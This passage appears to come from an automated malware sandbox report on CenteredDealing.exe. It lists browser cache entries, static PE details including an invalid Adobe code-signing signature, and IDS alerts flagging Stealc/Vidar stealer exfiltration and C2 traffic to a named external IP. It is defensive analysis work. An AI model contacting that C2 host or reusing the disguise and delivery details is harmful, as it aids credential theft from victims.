                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):132739
                                                                                                                                                                                                                                                                      Entropy (8bit):5.436659361483009
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:f8kJQ7O4N5dTm+syHEt4W3XdQ4Q6AuSr/nUW2i6o:fJQ7HTt/sHdQ4Q6ADfUW8o
                                                                                                                                                                                                                                                                      MD5:E2179884349D5828454972F5A860662B
                                                                                                                                                                                                                                                                      SHA1:600C338C45FAB6F546D0DD6934E2B283E52B7006
                                                                                                                                                                                                                                                                      SHA-256:B72DD41CE2ECCB43FE1AFD7C22FE1A7FE8D234E238BC05291DFC8ADA2E77B27C
                                                                                                                                                                                                                                                                      SHA-512:14D64992A4416F20DF59F2DA3235A022D3DFF16BC691B58CD498062770FEC6C588C4950F9F64400461BD593A64393DADAC02CF13B72D97953ACAF050C21FB5EC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                      Chrome Cache Entry: 90

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):175897
                                                                                                                                                                                                                                                                      Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                                      MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                                      SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                                      SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                                      SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                                      Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

                                                                                                                                                                                                                                                                      Chrome Cache Entry: 91

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5162
                                                                                                                                                                                                                                                                      Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                      MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                      SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                      SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                      SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                      Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                      Chrome Cache Entry: 92

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1660
                                                                                                                                                                                                                                                                      Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                      MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                      SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                      SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                      SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958215914632877
                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                      File name:CenteredDealing.exe
                                                                                                                                                                                                                                                                      File size:1'203'969 bytes
                                                                                                                                                                                                                                                                      MD5:228e734f246564bb255b68d51bd6d31e
                                                                                                                                                                                                                                                                      SHA1:13a36ae7bd290f4d7aba808d4435eb04008d3ac8
                                                                                                                                                                                                                                                                      SHA256:7174de5abf7299d3c6ab5460d57ff110be491dc47325c24465281200852f0f9a
                                                                                                                                                                                                                                                                      SHA512:bab72f4df67275da22a5fdfbf43eb55140dd6a68a025c263d12d30df8509b0d54c5b5388e8c49abeb0295c5fb5c8dae20f087f6230a6e214877765fef4e1c8b9
                                                                                                                                                                                                                                                                      SSDEEP:24576:iE8W1Aw4BDEsIDdr7Bigm1Vm5Obojw0Z4FIRuYcT9:PZB4HmSgm1A5bx3RuYI
                                                                                                                                                                                                                                                                      TLSH:28453391EFA0E9B6EEF70B33257AC1165CB51B2449E08D97130689C93E31B221A1D77F
                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8.....

                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                      Icon Hash:000103061e346400

                                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                      Entrypoint:0x403883
                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                      Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                                                      • 03/11/2023 00:00:00 04/11/2025 23:59:59
                                                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                                                      • CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                                                      Thumbprint MD5:464C015DAA50884AB4DD5502E6B164B0
                                                                                                                                                                                                                                                                      Thumbprint SHA-1:96B7B1EF175BBA4BDE33A05402134289B28B5BCB
                                                                                                                                                                                                                                                                      Thumbprint SHA-256:ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
                                                                                                                                                                                                                                                                      Serial:0D1A340F78D7D000E089FDBAAD6522DF

                                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                      sub esp, 000002D4h
                                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                      push 00000020h
                                                                                                                                                                                                                                                                      xor ebp, ebp
                                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                                      mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                      mov dword ptr [esp+10h], 00409268h
                                                                                                                                                                                                                                                                      mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                      call dword ptr [00408030h]
                                                                                                                                                                                                                                                                      push 00008001h
                                                                                                                                                                                                                                                                      call dword ptr [004080B4h]
                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                      call dword ptr [004082C0h]
                                                                                                                                                                                                                                                                      push 00000008h
                                                                                                                                                                                                                                                                      mov dword ptr [00472EB8h], eax
                                                                                                                                                                                                                                                                      call 00007F0238B110DBh
                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                      push 000002B4h
                                                                                                                                                                                                                                                                      mov dword ptr [00472DD0h], eax
                                                                                                                                                                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                      push 00409264h
                                                                                                                                                                                                                                                                      call dword ptr [00408184h]
                                                                                                                                                                                                                                                                      push 0040924Ch
                                                                                                                                                                                                                                                                      push 0046ADC0h
                                                                                                                                                                                                                                                                      call 00007F0238B10DBDh
                                                                                                                                                                                                                                                                      call dword ptr [004080B0h]
                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                      mov edi, 004C30A0h
                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                      call 00007F0238B10DABh
                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                      call dword ptr [00408134h]
                                                                                                                                                                                                                                                                      cmp word ptr [004C30A0h], 0022h
                                                                                                                                                                                                                                                                      mov dword ptr [00472DD8h], eax
                                                                                                                                                                                                                                                                      mov eax, edi
                                                                                                                                                                                                                                                                      jne 00007F0238B0E6AAh
                                                                                                                                                                                                                                                                      push 00000022h
                                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                                      mov eax, 004C30A2h
                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                      call 00007F0238B10A81h
                                                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                                                      call dword ptr [00408260h]
                                                                                                                                                                                                                                                                      mov esi, eax
                                                                                                                                                                                                                                                                      mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                      jmp 00007F0238B0E733h
                                                                                                                                                                                                                                                                      push 00000020h
                                                                                                                                                                                                                                                                      pop ebx
                                                                                                                                                                                                                                                                      cmp ax, bx
                                                                                                                                                                                                                                                                      jne 00007F0238B0E6AAh
                                                                                                                                                                                                                                                                      add esi, 02h
                                                                                                                                                                                                                                                                      cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                      • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x1275e.rsrc
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1235690x2998
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                      .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                      .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                      .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                      .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                      .rsrc0xf40000x1275e0x128003149e31166e44e11586d947b6dd166a0False0.8085541596283784data7.069380029797675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                      .reloc0x1070000xf320x1000b04273a029f831b5b1f4cdc62eff7d92False0.599609375data5.5222298895083215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                      RT_ICON0xf42500xcda3PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9740326349182228
                                                                                                                                                                                                                                                                      RT_ICON0x100ff40x11acPNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9964633068081344
                                                                                                                                                                                                                                                                      RT_ICON0x1021a00x88ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0050228310502283
                                                                                                                                                                                                                                                                      RT_ICON0x102a300x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.13578112286411717
                                                                                                                                                                                                                                                                      RT_ICON0x1050980x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.17304189435336975
                                                                                                                                                                                                                                                                      RT_DIALOG0x1061c00x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                      RT_DIALOG0x1062c00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                      RT_DIALOG0x1063dc0x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x10643c0x4cdataEnglishUnited States0.8026315789473685
                                                                                                                                                                                                                                                                      RT_MANIFEST0x1064880x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                      2024-12-31T21:33:24.150881+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.449739116.203.13.109443TCP
                                                                                                                                                                                                                                                                      2024-12-31T21:33:25.502688+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.449740116.203.13.109443TCP
                                                                                                                                                                                                                                                                      2024-12-31T21:33:26.891373+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.13.109443192.168.2.449741TCP
                                                                                                                                                                                                                                                                      2024-12-31T21:33:28.216201+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.13.109443192.168.2.449742TCP

                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
